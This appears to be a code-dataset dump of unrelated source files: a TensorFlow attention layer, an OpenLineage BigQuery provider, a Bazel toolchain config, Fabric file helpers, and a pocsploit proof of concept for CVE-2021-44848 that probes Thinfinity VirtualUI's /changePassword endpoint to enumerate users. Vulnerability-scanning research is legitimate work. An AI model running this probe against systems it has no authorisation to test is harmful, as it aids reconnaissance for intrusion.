self.wV = Dense(model_depth) #V weights
self.output_linear = Dense(model_depth)
def split_heads(self, x, batch_size):
#Split the last dimension into (num_heads, depth) where depth is the model_depth // num_heads
x = tf.reshape(x, (batch_size, -1, self.num_heads, self.depth))
#We transpose the result that the shape is (batch_size, num_heads, seq_len, depth)
return tf.transpose(x, perm=[0,2,1,3])
@staticmethod
def scaled_dot_product_attention(q, k, v, mask):
matmul_qk = tf.matmul(q, k, transpose_b=True) #(..., seq_len_q, seq_len_k)
#Scale the matmul
k_dim = tf.cast(tf.shape(k)[-1], tf.float32)
scaled_attention_logits = matmul_qk / tf.math.sqrt(k_dim)
#add mask to the scaled tensor (this will happen in the decoder layers)
if mask is not None:
scaled_attention_logits += (mask * -1e9)
attention_weights = Softmax(axis=-1)(scaled_attention_logits) # (..., seq_len_q, seq_len_k)
output = tf.matmul(attention_weights, v) #Multiply by the V value tu get the attention effect on the real values
return output, attention_weights
#kwargs -> (v,k,q,mask)
def __call__(self, inputs, k, q, mask):
v = inputs
batch_size = tf.shape(q)[0]
Q = self.wQ(q) #(batch_size, seq_len, d_model)
K = self.wK(k) #(batch_size, seq_len, d_model)
V = self.wV(v) #(batch_size, seq_len, d_model)
Q = self.split_heads(Q, batch_size) # (batch_size, num_heads, seq_len_q, depth)
K = self.split_heads(K, batch_size) # (batch_size, num_heads, seq_len_k, depth)
V = self.split_heads(V, batch_size) # (batch_size, num_heads, seq_len_v, depth)
# scaled_attention.shape == (batch_size, num_heads, seq_len_q, depth)
# attention_weights.shape == (batch_size, num_heads, seq_len_q, seq_len_k)
scaled_attention, attention_weights = MHA.scaled_dot_product_attention(Q, K, V, mask)
scaled_attention = tf.transpose(scaled_attention, perm=[0,2,1,3]) # (batch_size, seq_len_q, num_heads, depth)
concat_attention = tf.reshape(scaled_attention, (batch_size, -1, self.model_depth)) #(batch_size, seq_len_q, model_depth)
output = self.output_linear(concat_attention)
return output, attention_weights
| 44.444444
| 129
| 0.6675
|
794e4fd553852fea14b2360d5386e334b97832db
| 9,995
|
py
|
Python
|
integration/common/openlineage/common/provider/bigquery.py
|
kedar-cz/OpenLineage
|
bd75b53c84fd9655f593c4f161e15c14785eb93e
|
[
"Apache-2.0"
] | null | null | null |
integration/common/openlineage/common/provider/bigquery.py
|
kedar-cz/OpenLineage
|
bd75b53c84fd9655f593c4f161e15c14785eb93e
|
[
"Apache-2.0"
] | null | null | null |
integration/common/openlineage/common/provider/bigquery.py
|
kedar-cz/OpenLineage
|
bd75b53c84fd9655f593c4f161e15c14785eb93e
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import logging
import traceback
import attr
from typing import Tuple, Optional, Dict, List
from google.cloud import bigquery
from openlineage.common.dataset import Dataset, Source
from openlineage.common.models import DbTableSchema, DbColumn, DbTableName
from openlineage.common.schema import GITHUB_LOCATION
from openlineage.common.utils import get_from_nullable_chain
from openlineage.client.facet import BaseFacet, OutputStatisticsOutputDatasetFacet
_BIGQUERY_CONN_URL = 'bigquery'
@attr.s
class BigQueryErrorRunFacet(BaseFacet):
"""
Represents errors that can happen during execution of BigqueryExtractor
:param clientError: represents errors originating in bigquery client
:param parserError: represents errors that happened during parsing SQL provided to bigquery
"""
clientError: str = attr.ib(default=None)
parserError: str = attr.ib(default=None)
@staticmethod
def _get_schema() -> str:
return GITHUB_LOCATION + "bq-error-run-facet.json"
@attr.s
class BigQueryJobRunFacet(BaseFacet):
"""
Facet that represents relevant statistics of bigquery run.
:param cached: bigquery caches query results. Rest of the statistics will not be provided
for cached queries.
:param billedBytes: how many bytes bigquery bills for.
:param properties: full property tree of bigquery run.
"""
cached: bool = attr.ib()
billedBytes: int = attr.ib(default=None)
properties: str = attr.ib(default=None)
@staticmethod
def _get_schema() -> str:
return GITHUB_LOCATION + "bq-statistics-run-facet.json"
@attr.s
class BigQueryStatisticsDatasetFacet(BaseFacet):
"""
Facet that represents statistics of output dataset resulting from bigquery run.
:param outputRows: how many rows query produced.
:param size: size of output dataset in bytes.
"""
rowCount: int = attr.ib()
size: int = attr.ib()
def to_openlineage(self) -> OutputStatisticsOutputDatasetFacet:
return OutputStatisticsOutputDatasetFacet(
rowCount=self.rowCount,
size=self.size
)
@staticmethod
def _get_schema() -> str:
return GITHUB_LOCATION + "bq-statistics-dataset-facet.json"
@attr.s
class BigQueryFacets:
run_facets: Dict[str, BaseFacet] = attr.ib()
inputs: List[Dataset] = attr.ib()
output: Optional[Dataset] = attr.ib(default=None)
class BigQueryDatasetsProvider:
def __init__(
self,
client: Optional[bigquery.Client] = None,
logger: Optional[logging.Logger] = None
):
self.client = client
if client is None:
self.client = bigquery.Client()
self.logger = logger
if logger is None:
self.logger = logging.getLogger(__name__)
def get_facets(self, job_id: str) -> BigQueryFacets:
inputs = []
output = None
run_facets = {}
try:
try:
job = self.client.get_job(job_id=job_id)
props = job._properties
run_stat_facet, dataset_stat_facet = self._get_output_statistics(props)
run_facets.update({
"bigQuery_job": run_stat_facet
})
inputs = self._get_input_from_bq(props)
output = self._get_output_from_bq(props)
if output and dataset_stat_facet:
output.custom_facets.update({
"stats": dataset_stat_facet
})
output.output_facets.update({
'outputStatistics': dataset_stat_facet.to_openlineage()
})
finally:
# Ensure client has close() defined, otherwise ignore.
# NOTE: close() was introduced in python-bigquery v1.23.0
if hasattr(self.client, "close"):
self.client.close()
except Exception as e:
self.logger.error(
f"Cannot retrieve job details from BigQuery.Client. {e}",
exc_info=True
)
run_facets.update({
"bigQuery_error": BigQueryErrorRunFacet(
clientError=f"{e}: {traceback.format_exc()}",
)
})
return BigQueryFacets(run_facets, inputs, output)
def _get_output_statistics(self, properties) \
-> Tuple[BigQueryJobRunFacet, Optional[BigQueryStatisticsDatasetFacet]]:
stages = get_from_nullable_chain(properties, ['statistics', 'query', 'queryPlan'])
json_props = json.dumps(properties)
if not stages:
if get_from_nullable_chain(properties, ['statistics', 'query', 'statementType']) \
== 'CREATE_VIEW':
return BigQueryJobRunFacet(cached=False), None
# we're probably getting cached results
if get_from_nullable_chain(properties, ['statistics', 'query', 'cacheHit']):
return BigQueryJobRunFacet(cached=True), None
if get_from_nullable_chain(properties, ['status', 'state']) != "DONE":
raise ValueError("Trying to extract data from running bigquery job")
raise ValueError(
f"BigQuery properties did not have required data: queryPlan - {json_props}"
)
out_stage = stages[-1]
out_rows = out_stage.get("recordsWritten", None)
out_bytes = out_stage.get("shuffleOutputBytes", None)
billed_bytes = get_from_nullable_chain(properties, [
'statistics', 'query', 'totalBytesBilled'
])
return BigQueryJobRunFacet(
cached=False,
billedBytes=int(billed_bytes) if billed_bytes else None,
properties=json_props
), BigQueryStatisticsDatasetFacet(
rowCount=int(out_rows),
size=int(out_bytes)
) if out_bytes and out_rows else None
def _get_input_from_bq(self, properties):
bq_input_tables = get_from_nullable_chain(properties, [
'statistics', 'query', 'referencedTables'
])
if not bq_input_tables:
return []
input_table_names = [
self._bq_table_name(bq_t) for bq_t in bq_input_tables
]
sources = [
self._source() for bq_t in bq_input_tables
]
try:
return [
Dataset.from_table_schema(
source=source,
table_schema=table_schema
)
for table_schema, source in zip(self._get_table_schemas(
input_table_names
), sources)
]
except Exception as e:
self.logger.warning(f'Could not extract schema from bigquery. {e}')
return [
Dataset.from_table(source, table)
for table, source in zip(input_table_names, sources)
]
def _get_output_from_bq(self, properties) -> Optional[Dataset]:
bq_output_table = get_from_nullable_chain(properties, [
'configuration', 'query', 'destinationTable'
])
if not bq_output_table:
return None
output_table_name = self._bq_table_name(bq_output_table)
source = self._source()
table_schema = self._get_table_safely(output_table_name)
if table_schema:
return Dataset.from_table_schema(
source=source,
table_schema=table_schema,
)
else:
self.logger.warning("Could not resolve output table from bq")
return Dataset.from_table(source, output_table_name)
def _get_table_safely(self, output_table_name):
try:
return self._get_table(output_table_name)
except Exception as e:
self.logger.warning(f'Could not extract output schema from bigquery. {e}')
return None
def _get_table_schemas(self, tables: [str]) \
-> [DbTableSchema]:
# Avoid querying BigQuery by returning an empty array
# if no tables have been provided.
if not tables:
return []
return [self._get_table(table) for table in tables]
def _get_table(self, table: str) -> Optional[DbTableSchema]:
bq_table = self.client.get_table(table)
if not bq_table._properties:
return
table = bq_table._properties
fields = get_from_nullable_chain(table, ['schema', 'fields'])
if not fields:
return
columns = [DbColumn(
name=fields[i].get('name'),
type=fields[i].get('type'),
description=fields[i].get('description'),
ordinal_position=i
) for i in range(len(fields))]
return DbTableSchema(
schema_name=table.get('tableReference').get('projectId') + '.' +
table.get('tableReference').get('datasetId'),
table_name=DbTableName(table.get('tableReference').get('tableId')),
columns=columns
)
def _source(self) -> Source:
return Source(
scheme='bigquery',
connection_url='bigquery'
)
def _bq_table_name(self, bq_table):
project = bq_table.get('projectId')
dataset = bq_table.get('datasetId')
table = bq_table.get('tableId')
return f"{project}.{dataset}.{table}"
| 35.569395
| 95
| 0.62081
|
794e50c86281f1c318e204be96764db3bbdb104b
| 1,988
|
py
|
Python
|
2021/CVE-2021-44848/poc/pocsploit/CVE-2021-44848.py
|
hjyuan/reapoc
|
ef515e56c44c2590ff8601582bf6c08e076e7083
|
[
"Apache-2.0"
] | 421
|
2021-12-07T08:46:40.000Z
|
2022-03-31T12:42:16.000Z
|
2021/CVE-2021-44848/poc/pocsploit/CVE-2021-44848.py
|
hjyuan/reapoc
|
ef515e56c44c2590ff8601582bf6c08e076e7083
|
[
"Apache-2.0"
] | 5
|
2022-03-27T07:37:32.000Z
|
2022-03-31T13:56:11.000Z
|
2021/CVE-2021-44848/poc/pocsploit/CVE-2021-44848.py
|
hjyuan/reapoc
|
ef515e56c44c2590ff8601582bf6c08e076e7083
|
[
"Apache-2.0"
] | 144
|
2021-12-07T11:06:14.000Z
|
2022-03-31T07:41:35.000Z
|
import requests
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''Thinfinity VirtualUI User Enumeration''',
"description": '''Thinfinity VirtualUI (before v3.0), /changePassword returns different responses for requests depending on whether the username exists. It may enumerate OS users (Administrator, Guest, etc.)''',
"severity": "medium",
"references": [
"https://github.com/cybelesoft/virtualui/issues/1",
"https://nvd.nist.gov/vuln/detail/CVE-2021-44848",
"https://www.tenable.com/cve/CVE-2021-44848"
],
"classification": {
"cvss-metrics": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"cvss-score": "",
"cve-id": "CVE-2021-44848",
"cwe-id": "CWE-287"
},
"metadata":{
"vuln-target": "",
},
"tags": ["cve", "cve2021", "exposure", "thinfinity", "virtualui"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
try:
url = format_url(url)
path = """/changePassword?username=administrator"""
method = "GET"
data = """"""
headers = {}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if (re.search(r"""rc":(.*?)""",resp0.text) and re.search(r"""msg":"(.*?)""",resp0.text)) and (resp0.status_code == 200):
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url
| 28.811594
| 219
| 0.552817
|
794e51e631823cbf3206722135293ab85a845c98
| 8,088
|
bzl
|
Python
|
unix_toolchain_config.bzl
|
improbable-eng/BazelCon2019-cpp-toolchains-example
|
0e93672d5025a97a056a3029cbf496fc3a12183f
|
[
"MIT"
] | null | null | null |
unix_toolchain_config.bzl
|
improbable-eng/BazelCon2019-cpp-toolchains-example
|
0e93672d5025a97a056a3029cbf496fc3a12183f
|
[
"MIT"
] | null | null | null |
unix_toolchain_config.bzl
|
improbable-eng/BazelCon2019-cpp-toolchains-example
|
0e93672d5025a97a056a3029cbf496fc3a12183f
|
[
"MIT"
] | null | null | null |
load(
"@bazel_tools//tools/cpp:cc_toolchain_config_lib.bzl",
"action_config",
"artifact_name_pattern",
"env_entry",
"env_set",
"feature",
"feature_set",
"flag_group",
"flag_set",
"make_variable",
"tool",
"tool_path",
"variable_with_value",
"with_feature_set",
)
load("@bazel_tools//tools/build_defs/cc:action_names.bzl", "ACTION_NAMES")
load("@bazel_tools//tools/cpp:cc_toolchain_config.bzl", "all_compile_actions", "all_link_actions")
CLANG_OPTIONS = {
"compile_flags": [
"-Wall",
"-Wextra",
"-Werror",
"-Wpedantic",
"-fcolor-diagnostics",
# Keep stack frames for debugging, even in opt mode.
"-fno-omit-frame-pointer",
# Security hardening on by default.
# Conservative choice; -D_FORTIFY_SOURCE=2 may be unsafe in some cases.
# We need to undef it before redefining it as some distributions now have
# it enabled by default.
"-U_FORTIFY_SOURCE",
"-D_FORTIFY_SOURCE=1",
"-fstack-protector",
# Do not export symbols by default.
"-fvisibility=hidden",
"-fno-common",
],
"dbg_compile_flags": [
"-O0",
"-g",
],
"opt_compile_flags": [
"-g0",
# Conservative choice for -O.
# -O3 can increase binary size and even slow down the resulting binaries.
# Profile first and / or use FDO if you need better performance than this.
"-O2",
# Disable assertions.
"-DNDEBUG",
# Removal of unused code and data at link time (can this increase binary size in some cases?).
"-ffunction-sections",
"-fdata-sections",
],
"unfiltered_compile_flags": [
# Make compilation deterministic.
"-no-canonical-prefixes",
"-Wno-builtin-macro-redefined",
"-D__DATE__=\"redacted\"",
"-D__TIMESTAMP__=\"redacted\"",
"-D__TIME__=\"redacted\"",
],
"cxx_flags": [
"-std=c++11",
"-stdlib=libstdc++",
# Do not export symbols by default.
"-fvisibility-inlines-hidden",
],
"link_flags": [
"-latomic",
# Anticipated future default.
"-no-canonical-prefixes",
# Security hardening on by default.
"-Wl,-z,relro,-z,now",
"-lstdc++",
# ALL THE WARNINGS AND ERRORS - even during linking.
"-Wall",
"-Wextra",
"-Werror",
"-Wpedantic",
],
"opt_link_flags": [
"-O4",
"-Wl,--gc-sections",
],
}
def _impl(ctx):
tool_paths = [
tool_path(
name = name,
path = path,
)
for name, path in ctx.attr.tool_paths.items()
]
default_compile_flags_feature = feature(
name = "default_compile_flags",
enabled = True,
flag_sets = [
flag_set(
actions = all_compile_actions,
flag_groups = ([flag_group(flags = ctx.attr.compile_flags)] if ctx.attr.compile_flags else []),
),
flag_set(
actions = all_compile_actions,
flag_groups = ([flag_group(flags = ctx.attr.dbg_compile_flags)] if ctx.attr.dbg_compile_flags else []),
with_features = [with_feature_set(features = ["dbg"])],
),
flag_set(
actions = all_compile_actions,
flag_groups = ([flag_group(flags = ctx.attr.opt_compile_flags)] if ctx.attr.opt_compile_flags else []),
with_features = [with_feature_set(features = ["opt"])],
),
flag_set(
actions = [
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.lto_backend,
ACTION_NAMES.clif_match,
],
flag_groups = ([flag_group(flags = ctx.attr.cxx_flags)] if ctx.attr.cxx_flags else []),
),
],
)
default_link_flags_feature = feature(
name = "default_link_flags",
enabled = True,
flag_sets = [
flag_set(
actions = all_link_actions,
flag_groups = ([flag_group(flags = ctx.attr.link_flags)] if ctx.attr.link_flags else []),
),
flag_set(
actions = all_link_actions,
flag_groups = ([flag_group(flags = ctx.attr.opt_link_flags)] if ctx.attr.opt_link_flags else []),
with_features = [with_feature_set(features = ["opt"])],
),
flag_set(
actions = all_link_actions,
flag_groups = ([flag_group(flags = ctx.attr.dbg_link_flags)] if ctx.attr.dbg_link_flags else []),
with_features = [with_feature_set(features = ["dbg"])],
),
],
)
dbg_feature = feature(name = "dbg")
opt_feature = feature(name = "opt")
supports_dynamic_linker_feature = feature(name = "supports_dynamic_linker", enabled = True)
unfiltered_compile_flags_feature = feature(
name = "unfiltered_compile_flags",
enabled = True,
flag_sets = [
flag_set(
actions = [
ACTION_NAMES.assemble,
ACTION_NAMES.preprocess_assemble,
ACTION_NAMES.linkstamp_compile,
ACTION_NAMES.c_compile,
ACTION_NAMES.cpp_compile,
ACTION_NAMES.cpp_header_parsing,
ACTION_NAMES.cpp_module_compile,
ACTION_NAMES.cpp_module_codegen,
ACTION_NAMES.lto_backend,
ACTION_NAMES.clif_match,
],
flag_groups = [flag_group(flags = ctx.attr.unfiltered_compile_flags)],
),
],
)
supports_pic_feature = feature(name = "supports_pic", enabled = True)
features = [
default_compile_flags_feature,
default_link_flags_feature,
dbg_feature,
opt_feature,
supports_dynamic_linker_feature,
supports_pic_feature,
unfiltered_compile_flags_feature,
]
return cc_common.create_cc_toolchain_config_info(
ctx = ctx,
toolchain_identifier = ctx.attr.toolchain_identifier,
host_system_name = "x86_64-gcc_libstdcpp-linux",
target_system_name = ctx.attr.target_system_name,
target_cpu = ctx.attr.target_cpu,
target_libc = "local",
compiler = ctx.attr.compiler,
abi_version = ctx.attr.abi_version,
abi_libc_version = "local",
tool_paths = tool_paths,
features = features,
builtin_sysroot = ctx.attr.sysroot,
cxx_builtin_include_directories = ctx.attr.include_directories,
)
unix_cc_toolchain_config = rule(
implementation = _impl,
attrs = {
"abi_version": attr.string(mandatory = True),
"target_cpu": attr.string(mandatory = True),
"target_system_name": attr.string(mandatory = True),
"toolchain_identifier": attr.string(mandatory = True),
"tool_paths": attr.string_dict(mandatory = False),
# Optional parameters.
"compiler": attr.string(default = "generic_compiler_version"),
"compile_flags": attr.string_list(default = []),
"dbg_compile_flags": attr.string_list(default = []),
"opt_compile_flags": attr.string_list(default = []),
"unfiltered_compile_flags": attr.string_list(default = []),
"link_flags": attr.string_list(default = []),
"dbg_link_flags": attr.string_list(default = []),
"opt_link_flags": attr.string_list(default = []),
"cxx_flags": attr.string_list(default = []),
"include_directories": attr.string_list(default = []),
"sysroot": attr.string(default = ""),
},
provides = [CcToolchainConfigInfo],
)
| 34.564103
| 119
| 0.574184
|
794e522a02315848d186828f0cc557e7c8d2fe4f
| 15,728
|
py
|
Python
|
fabric/contrib/files.py
|
hrubi/fabric
|
5b7ba26915c188b7748dccd659d26e7b7e9056ae
|
[
"BSD-2-Clause"
] | 1
|
2015-11-06T10:46:27.000Z
|
2015-11-06T10:46:27.000Z
|
fabric/contrib/files.py
|
hrubi/fabric
|
5b7ba26915c188b7748dccd659d26e7b7e9056ae
|
[
"BSD-2-Clause"
] | null | null | null |
fabric/contrib/files.py
|
hrubi/fabric
|
5b7ba26915c188b7748dccd659d26e7b7e9056ae
|
[
"BSD-2-Clause"
] | 2
|
2019-01-01T18:35:50.000Z
|
2021-03-04T10:32:03.000Z
|
"""
Module providing easy API for working with remote files and folders.
"""
from __future__ import with_statement
import hashlib
import tempfile
import re
import os
from StringIO import StringIO
from fabric.api import *
from fabric.utils import apply_lcwd
def exists(path, use_sudo=False, verbose=False):
"""
Return True if given path exists on the current remote host.
If ``use_sudo`` is True, will use `sudo` instead of `run`.
`exists` will, by default, hide all output (including the run line, stdout,
stderr and any warning resulting from the file not existing) in order to
avoid cluttering output. You may specify ``verbose=True`` to change this
behavior.
"""
func = use_sudo and sudo or run
cmd = 'test -e %s' % _expand_path(path)
# If verbose, run normally
if verbose:
with settings(warn_only=True):
return not func(cmd).failed
# Otherwise, be quiet
with settings(hide('everything'), warn_only=True):
return not func(cmd).failed
def is_link(path, use_sudo=False, verbose=False):
"""
Return True if the given path is a symlink on the current remote host.
If ``use_sudo`` is True, will use `.sudo` instead of `.run`.
`.is_link` will, by default, hide all output. Give ``verbose=True`` to change this.
"""
func = sudo if use_sudo else run
cmd = 'test -L "$(echo %s)"' % path
args, kwargs = [], {'warn_only': True}
if not verbose:
opts = [hide('everything')]
with settings(*args, **kwargs):
return func(cmd).succeeded
def first(*args, **kwargs):
"""
Given one or more file paths, returns first one found, or None if none
exist. May specify ``use_sudo`` and ``verbose`` which are passed to `exists`.
"""
for directory in args:
if exists(directory, **kwargs):
return directory
def upload_template(filename, destination, context=None, use_jinja=False,
template_dir=None, use_sudo=False, backup=True, mirror_local_mode=False,
mode=None):
"""
Render and upload a template text file to a remote host.
Returns the result of the inner call to `~fabric.operations.put` -- see its
documentation for details.
``filename`` should be the path to a text file, which may contain `Python
string interpolation formatting
<http://docs.python.org/library/stdtypes.html#string-formatting>`_ and will
be rendered with the given context dictionary ``context`` (if given.)
Alternately, if ``use_jinja`` is set to True and you have the Jinja2
templating library available, Jinja will be used to render the template
instead. Templates will be loaded from the invoking user's current working
directory by default, or from ``template_dir`` if given.
The resulting rendered file will be uploaded to the remote file path
``destination``. If the destination file already exists, it will be
renamed with a ``.bak`` extension unless ``backup=False`` is specified.
By default, the file will be copied to ``destination`` as the logged-in
user; specify ``use_sudo=True`` to use `sudo` instead.
The ``mirror_local_mode`` and ``mode`` kwargs are passed directly to an
internal `~fabric.operations.put` call; please see its documentation for
details on these two options.
.. versionchanged:: 1.1
Added the ``backup``, ``mirror_local_mode`` and ``mode`` kwargs.
"""
func = use_sudo and sudo or run
# Normalize destination to be an actual filename, due to using StringIO
with settings(hide('everything'), warn_only=True):
if func('test -d %s' % _expand_path(destination)).succeeded:
sep = "" if destination.endswith('/') else "/"
destination += sep + os.path.basename(filename)
# Use mode kwarg to implement mirror_local_mode, again due to using
# StringIO
if mirror_local_mode and mode is None:
mode = os.stat(filename).st_mode
# To prevent put() from trying to do this
# logic itself
mirror_local_mode = False
# Process template
text = None
if use_jinja:
try:
template_dir = template_dir or os.getcwd()
template_dir = apply_lcwd(template_dir, env)
from jinja2 import Environment, FileSystemLoader
jenv = Environment(loader=FileSystemLoader(template_dir))
text = jenv.get_template(filename).render(**context or {})
# Force to a byte representation of Unicode, or str()ification
# within Paramiko's SFTP machinery may cause decode issues for
# truly non-ASCII characters.
text = text.encode('utf-8')
except ImportError:
import traceback
tb = traceback.format_exc()
abort(tb + "\nUnable to import Jinja2 -- see above.")
else:
filename = apply_lcwd(filename, env)
with open(os.path.expanduser(filename)) as inputfile:
text = inputfile.read()
if context:
text = text % context
# Back up original file
if backup and exists(destination):
func("cp %s{,.bak}" % _expand_path(destination))
# Upload the file.
return put(
local_path=StringIO(text),
remote_path=destination,
use_sudo=use_sudo,
mirror_local_mode=mirror_local_mode,
mode=mode
)
def sed(filename, before, after, limit='', use_sudo=False, backup='.bak',
flags='', shell=False):
"""
Run a search-and-replace on ``filename`` with given regex patterns.
Equivalent to ``sed -i<backup> -r -e "/<limit>/ s/<before>/<after>/<flags>g"
<filename>``. Setting ``backup`` to an empty string will, disable backup
file creation.
For convenience, ``before`` and ``after`` will automatically escape forward
slashes, single quotes and parentheses for you, so you don't need to
specify e.g. ``http:\/\/foo\.com``, instead just using ``http://foo\.com``
is fine.
If ``use_sudo`` is True, will use `sudo` instead of `run`.
The ``shell`` argument will be eventually passed to `run`/`sudo`. It
defaults to False in order to avoid problems with many nested levels of
quotes and backslashes. However, setting it to True may help when using
``~fabric.operations.cd`` to wrap explicit or implicit ``sudo`` calls.
(``cd`` by it's nature is a shell built-in, not a standalone command, so it
should be called within a shell.)
Other options may be specified with sed-compatible regex flags -- for
example, to make the search and replace case insensitive, specify
``flags="i"``. The ``g`` flag is always specified regardless, so you do not
need to remember to include it when overriding this parameter.
.. versionadded:: 1.1
The ``flags`` parameter.
.. versionadded:: 1.6
Added the ``shell`` keyword argument.
"""
func = use_sudo and sudo or run
# Characters to be escaped in both
for char in "/'":
before = before.replace(char, r'\%s' % char)
after = after.replace(char, r'\%s' % char)
# Characters to be escaped in replacement only (they're useful in regexen
# in the 'before' part)
for char in "()":
after = after.replace(char, r'\%s' % char)
if limit:
limit = r'/%s/ ' % limit
context = {
'script': r"'%ss/%s/%s/%sg'" % (limit, before, after, flags),
'filename': _expand_path(filename),
'backup': backup
}
# Test the OS because of differences between sed versions
with hide('running', 'stdout'):
platform = run("uname")
if platform in ('NetBSD', 'OpenBSD', 'QNX'):
# Attempt to protect against failures/collisions
hasher = hashlib.sha1()
hasher.update(env.host_string)
hasher.update(filename)
context['tmp'] = "/tmp/%s" % hasher.hexdigest()
# Use temp file to work around lack of -i
expr = r"""cp -p %(filename)s %(tmp)s \
&& sed -r -e %(script)s %(filename)s > %(tmp)s \
&& cp -p %(filename)s %(filename)s%(backup)s \
&& mv %(tmp)s %(filename)s"""
else:
context['extended_regex'] = '-E' if platform == 'Darwin' else '-r'
expr = r"sed -i%(backup)s %(extended_regex)s -e %(script)s %(filename)s"
command = expr % context
return func(command, shell=shell)
def uncomment(filename, regex, use_sudo=False, char='#', backup='.bak',
shell=False):
"""
Attempt to uncomment all lines in ``filename`` matching ``regex``.
The default comment delimiter is `#` and may be overridden by the ``char``
argument.
This function uses the `sed` function, and will accept the same
``use_sudo``, ``shell`` and ``backup`` keyword arguments that `sed` does.
`uncomment` will remove a single whitespace character following the comment
character, if it exists, but will preserve all preceding whitespace. For
example, ``# foo`` would become ``foo`` (the single space is stripped) but
`` # foo`` would become `` foo`` (the single space is still stripped,
but the preceding 4 spaces are not.)
.. versionchanged:: 1.6
Added the ``shell`` keyword argument.
"""
return sed(
filename,
before=r'^([[:space:]]*)%s[[:space:]]?' % char,
after=r'\1',
limit=regex,
use_sudo=use_sudo,
backup=backup,
shell=shell
)
def comment(filename, regex, use_sudo=False, char='#', backup='.bak',
shell=False):
"""
Attempt to comment out all lines in ``filename`` matching ``regex``.
The default commenting character is `#` and may be overridden by the
``char`` argument.
This function uses the `sed` function, and will accept the same
``use_sudo``, ``shell`` and ``backup`` keyword arguments that `sed` does.
`comment` will prepend the comment character to the beginning of the line,
so that lines end up looking like so::
this line is uncommented
#this line is commented
# this line is indented and commented
In other words, comment characters will not "follow" indentation as they
sometimes do when inserted by hand. Neither will they have a trailing space
unless you specify e.g. ``char='# '``.
.. note::
In order to preserve the line being commented out, this function will
wrap your ``regex`` argument in parentheses, so you don't need to. It
will ensure that any preceding/trailing ``^`` or ``$`` characters are
correctly moved outside the parentheses. For example, calling
``comment(filename, r'^foo$')`` will result in a `sed` call with the
"before" regex of ``r'^(foo)$'`` (and the "after" regex, naturally, of
``r'#\\1'``.)
.. versionadded:: 1.5
Added the ``shell`` keyword argument.
"""
carot, dollar = '', ''
if regex.startswith('^'):
carot = '^'
regex = regex[1:]
if regex.endswith('$'):
dollar = '$'
regex = regex[:-1]
regex = "%s(%s)%s" % (carot, regex, dollar)
return sed(
filename,
before=regex,
after=r'%s\1' % char,
use_sudo=use_sudo,
backup=backup,
shell=shell
)
def contains(filename, text, exact=False, use_sudo=False, escape=True,
shell=False):
"""
Return True if ``filename`` contains ``text`` (which may be a regex.)
By default, this function will consider a partial line match (i.e. where
``text`` only makes up part of the line it's on). Specify ``exact=True`` to
change this behavior so that only a line containing exactly ``text``
results in a True return value.
This function leverages ``egrep`` on the remote end (so it may not follow
Python regular expression syntax perfectly), and skips ``env.shell``
wrapper by default.
If ``use_sudo`` is True, will use `sudo` instead of `run`.
If ``escape`` is False, no extra regular expression related escaping is
performed (this includes overriding ``exact`` so that no ``^``/``$`` is
added.)
The ``shell`` argument will be eventually passed to ``run/sudo``. See
description of the same argumnet in ``~fabric.contrib.sed`` for details.
.. versionchanged:: 1.0
Swapped the order of the ``filename`` and ``text`` arguments to be
consistent with other functions in this module.
.. versionchanged:: 1.4
Updated the regular expression related escaping to try and solve
various corner cases.
.. versionchanged:: 1.4
Added ``escape`` keyword argument.
.. versionadded:: 1.6
Added the ``shell`` keyword argument.
"""
func = use_sudo and sudo or run
if escape:
text = _escape_for_regex(text)
if exact:
text = "^%s$" % text
with settings(hide('everything'), warn_only=True):
egrep_cmd = 'egrep "%s" %s' % (text, _expand_path(filename))
return func(egrep_cmd, shell=shell).succeeded
def append(filename, text, use_sudo=False, partial=False, escape=True,
shell=False):
"""
Append string (or list of strings) ``text`` to ``filename``.
When a list is given, each string inside is handled independently (but in
the order given.)
If ``text`` is already found in ``filename``, the append is not run, and
None is returned immediately. Otherwise, the given text is appended to the
end of the given ``filename`` via e.g. ``echo '$text' >> $filename``.
The test for whether ``text`` already exists defaults to a full line match,
e.g. ``^<text>$``, as this seems to be the most sensible approach for the
"append lines to a file" use case. You may override this and force partial
searching (e.g. ``^<text>``) by specifying ``partial=True``.
Because ``text`` is single-quoted, single quotes will be transparently
backslash-escaped. This can be disabled with ``escape=False``.
If ``use_sudo`` is True, will use `sudo` instead of `run`.
The ``shell`` argument will be eventually passed to ``run/sudo``. See
description of the same argumnet in ``~fabric.contrib.sed`` for details.
.. versionchanged:: 0.9.1
Added the ``partial`` keyword argument.
.. versionchanged:: 1.0
Swapped the order of the ``filename`` and ``text`` arguments to be
consistent with other functions in this module.
.. versionchanged:: 1.0
Changed default value of ``partial`` kwarg to be ``False``.
.. versionchanged:: 1.4
Updated the regular expression related escaping to try and solve
various corner cases.
.. versionadded:: 1.6
Added the ``shell`` keyword argument.
"""
func = use_sudo and sudo or run
# Normalize non-list input to be a list
if isinstance(text, basestring):
text = [text]
for line in text:
regex = '^' + _escape_for_regex(line) + ('' if partial else '$')
if (exists(filename, use_sudo=use_sudo) and line
and contains(filename, regex, use_sudo=use_sudo, escape=False,
shell=shell)):
continue
line = line.replace("'", r"'\\''") if escape else line
func("echo '%s' >> %s" % (line, _expand_path(filename)))
def _escape_for_regex(text):
"""Escape ``text`` to allow literal matching using egrep"""
regex = re.escape(text)
# Seems like double escaping is needed for \
regex = regex.replace('\\\\', '\\\\\\')
# Triple-escaping seems to be required for $ signs
